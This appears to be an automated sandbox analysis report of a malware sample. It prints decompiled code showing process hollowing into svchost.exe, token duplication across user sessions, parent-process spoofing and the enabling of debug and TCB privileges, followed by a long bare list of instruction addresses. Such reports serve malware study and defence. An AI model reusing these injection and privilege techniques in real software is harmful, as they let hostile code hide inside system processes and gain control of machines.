                                                            • SYSTEM\CurrentControlSet\Services\%s\Parameters, xrefs: 04643289
                                                            • ServiceDll, xrefs: 04643305
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Service$Local$AllocCloseHandle$EnumOpenQueryServicesStatus$ConfigConfig2FreeManager
                                                            • String ID: SYSTEM\CurrentControlSet\Services\%s\Parameters$ServiceDll
                                                            • API String ID: 703603788-2144606380
                                                            • Opcode ID: 800ad640a889de1ed9485f1983cbf1d48c520255a481ef61ecba351764c53a3a
                                                            • Instruction ID: 975194027478c12aaf90d39ab3ec4724b74071c495d7e22c8c9f13ef63eb7684
                                                            • Opcode Fuzzy Hash: 800ad640a889de1ed9485f1983cbf1d48c520255a481ef61ecba351764c53a3a
                                                            • Instruction Fuzzy Hash: 89222EB190022C9BEB25DF68DC85F9AB7B9EF84304F1042D6E509E7251EF35AA94CF50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 75%
                                                            			E04649910(void* __ecx, long __edx) {
                                                            				signed int _v12;
                                                            				short _v536;
                                                            				short _v1056;
                                                            				void* _v1332;
                                                            				struct _OSVERSIONINFOW _v1336;
                                                            				struct _CONTEXT _v2056;
                                                            				long _v2060;
                                                            				void* _v2064;
                                                            				void* _v2068;
                                                            				void* _v2072;
                                                            				int _v2076;
                                                            				void* _v2080;
                                                            				void* _v2084;
                                                            				struct _PROCESS_INFORMATION _v2100;
                                                            				void* _v2104;
                                                            				void _v2108;
                                                            				long _v2112;
                                                            				void* _v2116;
                                                            				long _v2120;
                                                            				intOrPtr _v2124;
                                                            				struct _STARTUPINFOW _v2192;
                                                            				void* _v2216;
                                                            				void* _v2220;
                                                            				char _v2224;
                                                            				void* _v2228;
                                                            				char _v2232;
                                                            				long _v2236;
                                                            				void* __ebx;
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				signed int _t111;
                                                            				long _t119;
                                                            				signed int _t121;
                                                            				void* _t129;
                                                            				void* _t136;
                                                            				void* _t139;
                                                            				long _t140;
                                                            				_Unknown_base(*)()* _t146;
                                                            				signed int _t154;
                                                            				signed int _t155;
                                                            				_Unknown_base(*)()* _t157;
                                                            				void* _t160;
                                                            				void* _t167;
                                                            				void* _t170;
                                                            				void* _t174;
                                                            				void* _t179;
                                                            				void* _t182;
                                                            				long _t185;
                                                            				void* _t186;
                                                            				void* _t188;
                                                            				void* _t195;
                                                            				void* _t201;
                                                            				long _t202;
                                                            				void* _t211;
                                                            				intOrPtr _t218;
                                                            				void* _t225;
                                                            				void* _t226;
                                                            				long _t227;
                                                            				intOrPtr _t228;
                                                            				void* _t229;
                                                            				void* _t230;
                                                            				intOrPtr* _t231;
                                                            				void* _t238;
                                                            				intOrPtr* _t240;
                                                            				intOrPtr* _t241;
                                                            				void* _t260;
                                                            				void* _t264;
                                                            				void* _t266;
                                                            				void* _t267;
                                                            				long _t268;
                                                            				void* _t269;
                                                            				void* _t272;
                                                            				intOrPtr* _t274;
                                                            				intOrPtr* _t275;
                                                            				void* _t277;
                                                            				void* _t280;
                                                            				void* _t281;
                                                            				void* _t287;
                                                            				signed int _t290;
                                                            				void* _t292;
                                                            				signed int _t294;
                                                            				void* _t298;
                                                            				long _t303;
                                                            
                                                            				_t233 = __ecx;
                                                            				_t111 =  *0x4684008; // 0xd355be4e
                                                            				_v12 = _t111 ^ _t290;
                                                            				_v2112 = __edx;
                                                            				_v2116 = __ecx;
                                                            				E0465DEA0(_t264,  &_v2192, 0, 0x48);
                                                            				_v2192.cb = 0x48;
                                                            				_t275 = 0;
                                                            				_v2060 = 0xc;
                                                            				_v2076 = 0;
                                                            				asm("xorps xmm0, xmm0");
                                                            				_v2064 = 0;
                                                            				asm("movups [ebp-0x830], xmm0");
                                                            				_v2084 = 0;
                                                            				E0465DEA0(_t264,  &_v1336, 0, 0x114);
                                                            				_t294 = _t292 + 0x18;
                                                            				_v1336.dwOSVersionInfoSize = 0x114;
                                                            				GetVersionExW( &_v1336);
                                                            				asm("sbb ebx, ebx");
                                                            				_t226 = _t225 + 1;
                                                            				_t119 = E04645CA0(_t226, _t264, 0);
                                                            				if(_t119 == 0) {
                                                            					_t119 = E04645D40(_t264, 0);
                                                            					_t303 = _t119;
                                                            				}
                                                            				if(_t303 != 0 && _t226 != 0) {
                                                            					_t211 = OpenProcess(0x1fffff, 0, _t119);
                                                            					_v2084 = _t211;
                                                            					if(_t211 != 0) {
                                                            						_t275 = GetProcAddress(LoadLibraryA("kernel32.dll"), "InitializeProcThreadAttributeList");
                                                            						_t274 = GetProcAddress(LoadLibraryA("kernel32.dll"), "UpdateProcThreadAttribute");
                                                            						if(_t274 != 0) {
                                                            							_t307 = _t275;
                                                            							if(_t275 != 0) {
                                                            								 *_t275(0, 1, 0,  &_v2076);
                                                            								_push(_v2076);
                                                            								_t218 = L04655B55(_t233, _t275, _t307);
                                                            								_t294 = _t294 + 4;
                                                            								_v2064 = _t218;
                                                            								_push( &_v2076);
                                                            								_push(0);
                                                            								_push(1);
                                                            								_push(_t218);
                                                            								if( *_t275() == 0) {
                                                            									_push(_v2064);
                                                            									goto L12;
                                                            								} else {
                                                            									_t275 = _v2064;
                                                            									_push(0);
                                                            									_push(0);
                                                            									_push(4);
                                                            									_push( &_v2084);
                                                            									_push(0x20000);
                                                            									_push(0);
                                                            									_push(_t275);
                                                            									if( *_t274() == 0) {
                                                            										_push(_t275);
                                                            										L12:
                                                            										L04655B0F();
                                                            										_t294 = _t294 + 4;
                                                            										__eflags = 0;
                                                            										_v2064 = 0;
                                                            									} else {
                                                            										_v2124 = _t275;
                                                            										_v2060 = 0x8000c;
                                                            									}
                                                            								}
                                                            							}
                                                            						}
                                                            					}
                                                            				}
                                                            				_t266 = 0;
                                                            				_t121 = GetSystemDirectoryW( &_v536, 0x104);
                                                            				if( *((short*)(_t290 + _t121 * 2 - 0x216)) == 0x5c) {
                                                            					L16:
                                                            					wsprintfW( &_v1056, L"%ssvchost.exe -k WspService",  &_v536);
                                                            					if(_t226 == 0) {
                                                            						L34:
                                                            						_t227 = _v2060;
                                                            						goto L35;
                                                            					} else {
                                                            						_v2080 = _t266;
                                                            						_v2104 = _t266;
                                                            						_t238 = GetProcAddress(LoadLibraryA("Wtsapi32.dll"), "WTSEnumerateSessionsW");
                                                            						_t229 = 0;
                                                            						_v2072 = _t238;
                                                            						while(1) {
                                                            							_push( &_v2104);
                                                            							_push( &_v2080);
                                                            							_push(1);
                                                            							_push(0);
                                                            							_push(0);
                                                            							if( *_t238() == 0) {
                                                            								break;
                                                            							}
                                                            							_t260 = _v2104;
                                                            							_t154 = 0;
                                                            							_t280 = _v2080;
                                                            							if(_t260 == 0) {
                                                            								L25:
                                                            								_t155 = 0;
                                                            								if(_t260 != 0) {
                                                            									_t240 = _t280 + 8;
                                                            									while( *_t240 != 1) {
                                                            										_t155 = _t155 + 1;
                                                            										_t240 = _t240 + 0xc;
                                                            										if(_t155 < _t260) {
                                                            											continue;
                                                            										} else {
                                                            										}
                                                            										goto L31;
                                                            									}
                                                            									_t266 =  *(_t280 + (_t155 + _t155 * 2) * 4);
                                                            								}
                                                            							} else {
                                                            								_t241 = _t280 + 8;
                                                            								while( *_t241 != 0) {
                                                            									_t154 = _t154 + 1;
                                                            									_t241 = _t241 + 0xc;
                                                            									if(_t154 < _t260) {
                                                            										continue;
                                                            									} else {
                                                            										goto L25;
                                                            									}
                                                            									goto L31;
                                                            								}
                                                            								_t266 =  *(_t280 + (_t154 + _t154 * 2) * 4);
                                                            								__eflags = _t266;
                                                            								if(_t266 == 0) {
                                                            									goto L25;
                                                            								}
                                                            							}
                                                            							L31:
                                                            							_t157 = GetProcAddress(LoadLibraryA("Wtsapi32.dll"), "WTSFreeMemory");
                                                            							 *_t157(_v2080);
                                                            							if(_t266 != 0) {
                                                            								_v2108 = _t266;
                                                            								_v2072 = 0;
                                                            								_v2068 = 0;
                                                            								_t160 = OpenProcessToken(GetCurrentProcess(), 0xb,  &_v2072);
                                                            								__eflags = _t160;
                                                            								if(_t160 != 0) {
                                                            									_t167 = DuplicateTokenEx(_v2072, 0x2000000, 0, 0, 1,  &_v2068);
                                                            									__eflags = _t167;
                                                            									if(_t167 != 0) {
                                                            										_t170 = SetTokenInformation(_v2068, 0xc,  &_v2108, 4);
                                                            										__eflags = _t170;
                                                            										if(_t170 == 0) {
                                                            											CloseHandle(_v2068);
                                                            											_v2068 = 0;
                                                            										}
                                                            									}
                                                            									CloseHandle(_v2072);
                                                            								}
                                                            								_t281 = _v2068;
                                                            								_t227 = _v2060;
                                                            								__eflags = _t281;
                                                            								if(_t281 == 0) {
                                                            									goto L35;
                                                            								} else {
                                                            									_t267 = CreateProcessAsUserW(_t281, 0,  &_v1056, 0, 0, 0, _t227, 0, 0,  &_v2192,  &_v2100);
                                                            									CloseHandle(_t281);
                                                            									__eflags = _t267;
                                                            									if(_t267 == 0) {
                                                            										L35:
                                                            										_t267 = CreateProcessW(0,  &_v1056, 0, 0, 0, _t227, 0, 0,  &_v2192,  &_v2100);
                                                            									}
                                                            								}
                                                            							} else {
                                                            								Sleep(0xbb8);
                                                            								_t238 = _v2072;
                                                            								_t229 = _t229 + 1;
                                                            								if(_t229 < 0xa) {
                                                            									continue;
                                                            								} else {
                                                            									break;
                                                            								}
                                                            							}
                                                            							goto L36;
                                                            						}
                                                            						goto L34;
                                                            					}
                                                            					L36:
                                                            					_t228 = _v2064;
                                                            					if(_t228 != 0) {
                                                            						_t146 = GetProcAddress(LoadLibraryA("kernel32.dll"), "DeleteProcThreadAttributeList");
                                                            						if(_t146 != 0) {
                                                            							 *_t146(_t228);
                                                            						}
                                                            						_push(1);
                                                            						E04655B47(_t228);
                                                            					}
                                                            					_t129 = _v2084;
                                                            					if(_t129 != 0) {
                                                            						CloseHandle(_t129);
                                                            					}
                                                            					if(_t267 == 0) {
                                                            						L46:
                                                            						return E04655AFE(_v12 ^ _t290);
                                                            					} else {
                                                            						_v2056.ContextFlags = 0x10007;
                                                            						if(GetThreadContext(_v2100.hThread,  &_v2056) == 0) {
                                                            							goto L46;
                                                            						} else {
                                                            							_t268 = _v2112;
                                                            							_t277 = VirtualAllocEx(_v2100.hProcess, 0, _t268, 0x3000, 0x40);
                                                            							if(_t277 != 0) {
                                                            								_t136 = WriteProcessMemory(_v2100.hProcess, _t277, _v2116, _t268,  &_v2120);
                                                            								__eflags = _t136;
                                                            								if(_t136 == 0) {
                                                            									goto L45;
                                                            								} else {
                                                            									_v2056.Eip = _t277;
                                                            									_t139 = SetThreadContext(_v2100.hThread,  &_v2056);
                                                            									__eflags = _t139;
                                                            									if(_t139 == 0) {
                                                            										goto L45;
                                                            									} else {
                                                            										_t140 = ResumeThread(_v2100.hThread);
                                                            										__eflags = _t140 - 0xffffffff;
                                                            										if(_t140 == 0xffffffff) {
                                                            											goto L45;
                                                            										} else {
                                                            											CloseHandle(_v2100.hThread);
                                                            											__eflags = _v12 ^ _t290;
                                                            											return E04655AFE(_v12 ^ _t290);
                                                            										}
                                                            									}
                                                            								}
                                                            							} else {
                                                            								L45:
                                                            								TerminateProcess(_v2100, 0);
                                                            								goto L46;
                                                            							}
                                                            						}
                                                            					}
                                                            				} else {
                                                            					 *((short*)(_t290 + _t121 * 2 - 0x214)) = 0x5c;
                                                            					_t174 = 2 + _t121 * 2;
                                                            					if(_t174 >= 0x208) {
                                                            						E04655FD9();
                                                            						asm("int3");
                                                            						asm("int3");
                                                            						asm("int3");
                                                            						asm("int3");
                                                            						asm("int3");
                                                            						asm("int3");
                                                            						asm("int3");
                                                            						asm("int3");
                                                            						asm("int3");
                                                            						asm("int3");
                                                            						_push(_t290);
                                                            						_t298 = (_t294 & 0xfffffff8) - 0x14;
                                                            						_push(_t226);
                                                            						_push(_t275);
                                                            						_push(0);
                                                            						_t269 = E0464ADD0(L"SeTcbPrivilege", _t275);
                                                            						_t286 = E0464ADD0(L"SeDebugPrivilege", _t275);
                                                            						_t230 = E0464AC90(L"SeIncreaseQuotaPrivilege", _t269, _t286);
                                                            						_t179 = E0464AC90(L"SeAssignPrimaryTokenPrivilege", _t269, _t286);
                                                            						__eflags = _t179;
                                                            						_t180 = Sleep;
                                                            						if(_t179 == 0) {
                                                            							Sleep(0x1388);
                                                            							_t180 = Sleep;
                                                            						}
                                                            						__eflags = _t230;
                                                            						if(_t230 == 0) {
                                                            							 *_t180(0xbb8);
                                                            						}
                                                            						_t231 = Sleep;
                                                            						__eflags = _t269;
                                                            						if(_t269 == 0) {
                                                            							Sleep(0x1388);
                                                            						}
                                                            						__eflags = _t286;
                                                            						if(__eflags == 0) {
                                                            							Sleep(0x1388);
                                                            						}
                                                            						_v2216 = 0;
                                                            						_v2220 = 0;
                                                            						L04649390(_t231,  &_v2224, _t269, _t286, __eflags, L"Dispatch");
                                                            						__eflags = _v2228;
                                                            						_t270 = CloseHandle;
                                                            						if(_v2228 != 0) {
                                                            							L82:
                                                            							_t287 = 0;
                                                            							__eflags = 0;
                                                            						} else {
                                                            							__eflags = _v2220;
                                                            							_t232 = WaitForSingleObject;
                                                            							if(__eflags == 0) {
                                                            								goto L87;
                                                            							} else {
                                                            								_t202 = E046494D0(WaitForSingleObject, L"Dispatch", CloseHandle, _t286, __eflags);
                                                            								__eflags = _t202;
                                                            								if(__eflags == 0) {
                                                            									goto L87;
                                                            								} else {
                                                            									while(1) {
                                                            										__eflags = _t202 - 0x2fffffff;
                                                            										if(_t202 == 0x2fffffff) {
                                                            											break;
                                                            										}
                                                            										__eflags = _t202 - 0x1fffffff;
                                                            										if(_t202 == 0x1fffffff) {
                                                            											break;
                                                            										} else {
                                                            											_t286 = OpenThread(0x1fffff, 0, _t202);
                                                            											__eflags = _t286;
                                                            											if(__eflags == 0) {
                                                            												goto L87;
                                                            											} else {
                                                            												WaitForSingleObject(_t286, 0xffffffff);
                                                            												__eflags = GetExitCodeThread(_t286,  &_v2236);
                                                            												if(__eflags == 0) {
                                                            													L78:
                                                            													__eflags = L04649390(_t232,  &_v2232, _t270, _t286, __eflags, L"Dispatch");
                                                            													if(__eflags != 0) {
                                                            														goto L87;
                                                            													} else {
                                                            														_t202 = E046494D0(_t232, L"Dispatch", _t270, _t286, __eflags);
                                                            														__eflags = _t202;
                                                            														if(__eflags != 0) {
                                                            															continue;
                                                            														} else {
                                                            															while(1) {
                                                            																L87:
                                                            																_t185 = E046494D0(_t232, L"Control", _t270, _t286, __eflags);
                                                            																__eflags = _t185;
                                                            																if(__eflags == 0) {
                                                            																}
                                                            																L88:
                                                            																_v2236 = 0;
                                                            																_t188 = E04649620(_t232,  &_v2236, _t270, _t286, __eflags);
                                                            																_t271 = _t188;
                                                            																__eflags = _t188;
                                                            																if(__eflags == 0) {
                                                            																	L86:
                                                            																	_t270 = CloseHandle;
                                                            																} else {
                                                            																	_t261 = _v2236;
                                                            																	__eflags = _v2236;
                                                            																	if(__eflags == 0) {
                                                            																		goto L86;
                                                            																	} else {
                                                            																		_t286 = E04649910(_t271, _t261,  &_v2236);
                                                            																		L04655B0F(_t271);
                                                            																		_t270 = CloseHandle;
                                                            																		_t298 = _t298 + 8;
                                                            																		__eflags = _t286;
                                                            																		if(__eflags != 0) {
                                                            																			__eflags = WaitForSingleObject(_t286, 0xbb8) - 0x102;
                                                            																			if(__eflags == 0) {
                                                            																				CloseHandle(_t286);
                                                            																			}
                                                            																		}
                                                            																		while(1) {
                                                            																			L87:
                                                            																			_t185 = E046494D0(_t232, L"Control", _t270, _t286, __eflags);
                                                            																			__eflags = _t185;
                                                            																			if(__eflags == 0) {
                                                            																			}
                                                            																			goto L88;
                                                            																		}
                                                            																	}
                                                            																	while(1) {
                                                            																		L87:
                                                            																		_t185 = E046494D0(_t232, L"Control", _t270, _t286, __eflags);
                                                            																		__eflags = _t185;
                                                            																		if(__eflags == 0) {
                                                            																		}
                                                            																		goto L93;
                                                            																	}
                                                            																	goto L88;
                                                            																}
                                                            																continue;
                                                            																L93:
                                                            																__eflags = _t185 - 0x1fffffff;
                                                            																if(_t185 == 0x1fffffff) {
                                                            																	do {
                                                            																		_t186 = SetConsoleCtrlHandler(E0464AAF0, 0);
                                                            																		__eflags = _t186;
                                                            																	} while (_t186 != 0);
                                                            																	_t287 = 0x315;
                                                            																} else {
                                                            																	__eflags = _t185 - 0x2fffffff;
                                                            																	if(__eflags != 0) {
                                                            																		_t286 = OpenThread(0x1fffff, 0, _t185);
                                                            																		__eflags = _t286;
                                                            																		if(__eflags == 0) {
                                                            																			goto L88;
                                                            																		} else {
                                                            																			WaitForSingleObject(_t286, 0xffffffff);
                                                            																			CloseHandle(_t286);
                                                            																		}
                                                            																		continue;
                                                            																	} else {
                                                            																		Sleep(0x7d0);
                                                            																		_v2228 = 0;
                                                            																		_t195 = E04649620(_t232,  &_v2228, _t270, _t286, __eflags);
                                                            																		_t286 = _t195;
                                                            																		__eflags = _t195;
                                                            																		if(__eflags == 0) {
                                                            																			continue;
                                                            																		} else {
                                                            																			_t262 = _v2228;
                                                            																			__eflags = _v2228;
                                                            																			if(__eflags == 0) {
                                                            																				continue;
                                                            																			} else {
                                                            																				_t272 = E04649910(_t286, _t262,  &_v2228);
                                                            																				L04655B0F(_t286);
                                                            																				_t298 = _t298 + 8;
                                                            																				__eflags = _t272;
                                                            																				if(__eflags == 0) {
                                                            																					goto L86;
                                                            																				} else {
                                                            																					__eflags = WaitForSingleObject(_t272, 0xbb8) - 0x102;
                                                            																					if(__eflags != 0) {
                                                            																						goto L86;
                                                            																					} else {
                                                            																						CloseHandle(_t272);
                                                            																						E046378B0(_t232, L"Dispatch", 0x2fffffff, CloseHandle, _t286, __eflags);
                                                            																						do {
                                                            																							_t201 = SetConsoleCtrlHandler(E0464AAF0, 0);
                                                            																							__eflags = _t201;
                                                            																						} while (_t201 != 0);
                                                            																						_t287 = 0x315;
                                                            																					}
                                                            																				}
                                                            																			}
                                                            																		}
                                                            																	}
                                                            																}
                                                            																goto L83;
                                                            															}
                                                            														}
                                                            													}
                                                            												} else {
                                                            													__eflags = _v2236 - 0x315;
                                                            													if(__eflags == 0) {
                                                            														goto L82;
                                                            													} else {
                                                            														goto L78;
                                                            													}
                                                            												}
                                                            											}
                                                            										}
                                                            										goto L83;
                                                            									}
                                                            									E0464AAD0();
                                                            									goto L82;
                                                            								}
                                                            							}
                                                            						}
                                                            						L83:
                                                            						_t182 = _v2216;
                                                            						__eflags = _t182;
                                                            						if(_t182 != 0) {
                                                            							CloseHandle(_t182);
                                                            						}
                                                            						return _t287;
                                                            					} else {
                                                            						 *((short*)(_t290 + _t174 - 0x214)) = 0;
                                                            						goto L16;
                                                            					}
                                                            				}
                                                            			}






















































































                                                            0x04649910
                                                            0x04649919
                                                            0x04649920
                                                            0x0464992e
                                                            0x04649937
                                                            0x0464993d
                                                            0x04649945
                                                            0x0464994f
                                                            0x04649951
                                                            0x04649961
                                                            0x0464996b
                                                            0x0464996e
                                                            0x0464997b
                                                            0x04649982
                                                            0x04649988
                                                            0x0464998d
                                                            0x04649990
                                                            0x046499a1
                                                            0x046499ae
                                                            0x046499b0
                                                            0x046499b1
                                                            0x046499b8
                                                            0x046499ba
                                                            0x046499bf
                                                            0x046499bf
                                                            0x046499c7
                                                            0x046499dd
                                                            0x046499e3
                                                            0x046499eb
                                                            0x04649a0e
                                                            0x04649a19
                                                            0x04649a1d
                                                            0x04649a23
                                                            0x04649a25
                                                            0x04649a38
                                                            0x04649a3a
                                                            0x04649a40
                                                            0x04649a45
                                                            0x04649a48
                                                            0x04649a54
                                                            0x04649a55
                                                            0x04649a57
                                                            0x04649a59
                                                            0x04649a5e
                                                            0x04649a9c
                                                            0x00000000
                                                            0x04649a60
                                                            0x04649a60
                                                            0x04649a6c
                                                            0x04649a6e
                                                            0x04649a70
                                                            0x04649a72
                                                            0x04649a73
                                                            0x04649a78
                                                            0x04649a7a
                                                            0x04649a7f
                                                            0x04649a93
                                                            0x04649a9d
                                                            0x04649a9d
                                                            0x04649aa2
                                                            0x04649aa5
                                                            0x04649aa7
                                                            0x04649a81
                                                            0x04649a81
                                                            0x04649a87
                                                            0x04649a87
                                                            0x04649a7f
                                                            0x04649a5e
                                                            0x04649a25
                                                            0x04649a1d
                                                            0x046499eb
                                                            0x04649ab8
                                                            0x04649abb
                                                            0x04649aca
                                                            0x04649af5
                                                            0x04649b08
                                                            0x04649b19
                                                            0x04649c02
                                                            0x04649c02
                                                            0x00000000
                                                            0x04649b1f
                                                            0x04649b29
                                                            0x04649b2f
                                                            0x04649b42
                                                            0x04649b44
                                                            0x04649b46
                                                            0x04649b50
                                                            0x04649b56
                                                            0x04649b5d
                                                            0x04649b5e
                                                            0x04649b60
                                                            0x04649b62
                                                            0x04649b68
                                                            0x00000000
                                                            0x00000000
                                                            0x04649b6e
                                                            0x04649b74
                                                            0x04649b76
                                                            0x04649b7e
                                                            0x04649b9c
                                                            0x04649b9c
                                                            0x04649ba0
                                                            0x04649ba2
                                                            0x04649ba5
                                                            0x04649baa
                                                            0x04649bab
                                                            0x04649bb0
                                                            0x00000000
                                                            0x00000000
                                                            0x04649bb2
                                                            0x00000000
                                                            0x04649bb0
                                                            0x04649bb7
                                                            0x04649bb7
                                                            0x04649b80
                                                            0x04649b80
                                                            0x04649b83
                                                            0x04649b88
                                                            0x04649b89
                                                            0x04649b8e
                                                            0x00000000
                                                            0x04649b90
                                                            0x00000000
                                                            0x04649b90
                                                            0x00000000
                                                            0x04649b8e
                                                            0x04649b95
                                                            0x04649b98
                                                            0x04649b9a
                                                            0x00000000
                                                            0x00000000
                                                            0x04649b9a
                                                            0x04649bba
                                                            0x04649bcb
                                                            0x04649bd7
                                                            0x04649bdb
                                                            0x04649cde
                                                            0x04649ce4
                                                            0x04649cee
                                                            0x04649d08
                                                            0x04649d0e
                                                            0x04649d10
                                                            0x04649d2a
                                                            0x04649d30
                                                            0x04649d32
                                                            0x04649d45
                                                            0x04649d51
                                                            0x04649d53
                                                            0x04649d5b
                                                            0x04649d5d
                                                            0x04649d5d
                                                            0x04649d53
                                                            0x04649d75
                                                            0x04649d75
                                                            0x04649d77
                                                            0x04649d7d
                                                            0x04649d83
                                                            0x04649d85
                                                            0x00000000
                                                            0x04649d87
                                                            0x04649db7
                                                            0x04649db9
                                                            0x04649dbb
                                                            0x04649dbd
                                                            0x04649c08
                                                            0x04649c30
                                                            0x04649c30
                                                            0x04649dbd
                                                            0x04649be1
                                                            0x04649be6
                                                            0x04649bec
                                                            0x04649bf2
                                                            0x04649bf6
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x04649bf6
                                                            0x00000000
                                                            0x04649bdb
                                                            0x00000000
                                                            0x04649bfc
                                                            0x04649c32
                                                            0x04649c32
                                                            0x04649c3a
                                                            0x04649c4d
                                                            0x04649c55
                                                            0x04649c58
                                                            0x04649c58
                                                            0x04649c5a
                                                            0x04649c5d
                                                            0x04649c62
                                                            0x04649c65
                                                            0x04649c6d
                                                            0x04649c70
                                                            0x04649c70
                                                            0x04649c74
                                                            0x04649ccb
                                                            0x04649cdd
                                                            0x04649c76
                                                            0x04649c7c
                                                            0x04649c95
                                                            0x00000000
                                                            0x04649c97
                                                            0x04649c97
                                                            0x04649cb3
                                                            0x04649cb7
                                                            0x04649de8
                                                            0x04649dee
                                                            0x04649df0
                                                            0x00000000
                                                            0x04649df6
                                                            0x04649dfc
                                                            0x04649e09
                                                            0x04649e0f
                                                            0x04649e11
                                                            0x00000000
                                                            0x04649e17
                                                            0x04649e1d
                                                            0x04649e23
                                                            0x04649e26
                                                            0x00000000
                                                            0x04649e2c
                                                            0x04649e38
                                                            0x04649e43
                                                            0x04649e50
                                                            0x04649e50
                                                            0x04649e26
                                                            0x04649e11
                                                            0x04649cbd
                                                            0x04649cbd
                                                            0x04649cc5
                                                            0x00000000
                                                            0x04649cc5
                                                            0x04649cb7
                                                            0x04649c95
                                                            0x04649acc
                                                            0x04649ad1
                                                            0x04649ad9
                                                            0x04649ae5
                                                            0x04649e51
                                                            0x04649e56
                                                            0x04649e57
                                                            0x04649e58
                                                            0x04649e59
                                                            0x04649e5a
                                                            0x04649e5b
                                                            0x04649e5c
                                                            0x04649e5d
                                                            0x04649e5e
                                                            0x04649e5f
                                                            0x04649e60
                                                            0x04649e66
                                                            0x04649e6e
                                                            0x04649e6f
                                                            0x04649e70
                                                            0x04649e7b
                                                            0x04649e87
                                                            0x04649e93
                                                            0x04649e95
                                                            0x04649e9a
                                                            0x04649e9c
                                                            0x04649ea1
                                                            0x04649ea8
                                                            0x04649eaa
                                                            0x04649eaa
                                                            0x04649eaf
                                                            0x04649eb1
                                                            0x04649eb8
                                                            0x04649eb8
                                                            0x04649eba
                                                            0x04649ec0
                                                            0x04649ec2
                                                            0x04649ec9
                                                            0x04649ec9
                                                            0x04649ecb
                                                            0x04649ecd
                                                            0x04649ed4
                                                            0x04649ed4
                                                            0x04649edf
                                                            0x04649ee7
                                                            0x04649eef
                                                            0x04649ef4
                                                            0x04649ef9
                                                            0x04649eff
                                                            0x04649f90
                                                            0x04649f90
                                                            0x04649f90
                                                            0x04649f05
                                                            0x04649f05
                                                            0x04649f0a
                                                            0x04649f10
                                                            0x00000000
                                                            0x04649f16
                                                            0x04649f1b
                                                            0x04649f20
                                                            0x04649f22
                                                            0x00000000
                                                            0x04649f28
                                                            0x04649f28
                                                            0x04649f28
                                                            0x04649f2d
                                                            0x00000000
                                                            0x00000000
                                                            0x04649f2f
                                                            0x04649f34
                                                            0x00000000
                                                            0x04649f36
                                                            0x04649f44
                                                            0x04649f46
                                                            0x04649f48
                                                            0x00000000
                                                            0x04649f4a
                                                            0x04649f4d
                                                            0x04649f5b
                                                            0x04649f5d
                                                            0x04649f69
                                                            0x04649f77
                                                            0x04649f79
                                                            0x00000000
                                                            0x04649f7b
                                                            0x04649f80
                                                            0x04649f85
                                                            0x04649f87
                                                            0x00000000
                                                            0x04649f89
                                                            0x04649fae
                                                            0x04649fae
                                                            0x04649fb3
                                                            0x04649fb8
                                                            0x04649fba
                                                            0x04649fba
                                                            0x04649fbc
                                                            0x04649fc0
                                                            0x04649fc8
                                                            0x04649fcd
                                                            0x04649fcf
                                                            0x04649fd1
                                                            0x04649fa8
                                                            0x04649fa8
                                                            0x04649fd3
                                                            0x04649fd3
                                                            0x04649fd7
                                                            0x04649fd9
                                                            0x00000000
                                                            0x04649fdb
                                                            0x04649fe6
                                                            0x04649fe9
                                                            0x04649fee
                                                            0x04649ff4
                                                            0x04649ff7
                                                            0x04649ff9
                                                            0x0464a003
                                                            0x0464a008
                                                            0x0464a00b
                                                            0x0464a00b
                                                            0x0464a008
                                                            0x04649fae
                                                            0x04649fae
                                                            0x04649fb3
                                                            0x04649fb8
                                                            0x04649fba
                                                            0x04649fba
                                                            0x00000000
                                                            0x04649fba
                                                            0x04649fae
                                                            0x04649fae
                                                            0x04649fae
                                                            0x04649fb3
                                                            0x04649fb8
                                                            0x04649fba
                                                            0x04649fba
                                                            0x00000000
                                                            0x04649fba
                                                            0x00000000
                                                            0x04649fae
                                                            0x00000000
                                                            0x0464a00f
                                                            0x0464a00f
                                                            0x0464a014
                                                            0x0464a0f0
                                                            0x0464a0f7
                                                            0x0464a0f9
                                                            0x0464a0f9
                                                            0x0464a0fd
                                                            0x0464a01a
                                                            0x0464a01a
                                                            0x0464a01f
                                                            0x0464a0cb
                                                            0x0464a0cd
                                                            0x0464a0cf
                                                            0x00000000
                                                            0x0464a0d5
                                                            0x0464a0d8
                                                            0x0464a0db
                                                            0x0464a0db
                                                            0x00000000
                                                            0x0464a025
                                                            0x0464a02a
                                                            0x0464a034
                                                            0x0464a03c
                                                            0x0464a041
                                                            0x0464a043
                                                            0x0464a045
                                                            0x00000000
                                                            0x0464a04b
                                                            0x0464a04b
                                                            0x0464a04f
                                                            0x0464a051
                                                            0x00000000
                                                            0x0464a057
                                                            0x0464a062
                                                            0x0464a065
                                                            0x0464a06a
                                                            0x0464a06d
                                                            0x0464a06f
                                                            0x00000000
                                                            0x0464a075
                                                            0x0464a07d
                                                            0x0464a082
                                                            0x00000000
                                                            0x0464a088
                                                            0x0464a08f
                                                            0x0464a09b
                                                            0x0464a0a6
                                                            0x0464a0ad
                                                            0x0464a0af
                                                            0x0464a0af
                                                            0x0464a0b3
                                                            0x0464a0b3
                                                            0x0464a082
                                                            0x0464a06f
                                                            0x0464a051
                                                            0x0464a045
                                                            0x0464a01f
                                                            0x00000000
                                                            0x0464a014
                                                            0x04649fae
                                                            0x04649f87
                                                            0x04649f5f
                                                            0x04649f5f
                                                            0x04649f67
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x04649f67
                                                            0x04649f5d
                                                            0x04649f48
                                                            0x00000000
                                                            0x04649f34
                                                            0x04649f8b
                                                            0x00000000
                                                            0x04649f8b
                                                            0x04649f22
                                                            0x04649f10
                                                            0x04649f92
                                                            0x04649f92
                                                            0x04649f96
                                                            0x04649f98
                                                            0x04649f9b
                                                            0x04649f9b
                                                            0x04649fa5
                                                            0x04649aeb
                                                            0x04649aed
                                                            0x00000000
                                                            0x04649aed
                                                            0x04649ae5

                                                            APIs
                                                            • GetVersionExW.KERNEL32(00000114,?,?,?,00000000,00000000,74D0F750), ref: 046499A1
                                                              • Part of subcall function 04645CA0: GetCurrentProcessId.KERNEL32(?,74CB4DC0), ref: 04645CB5
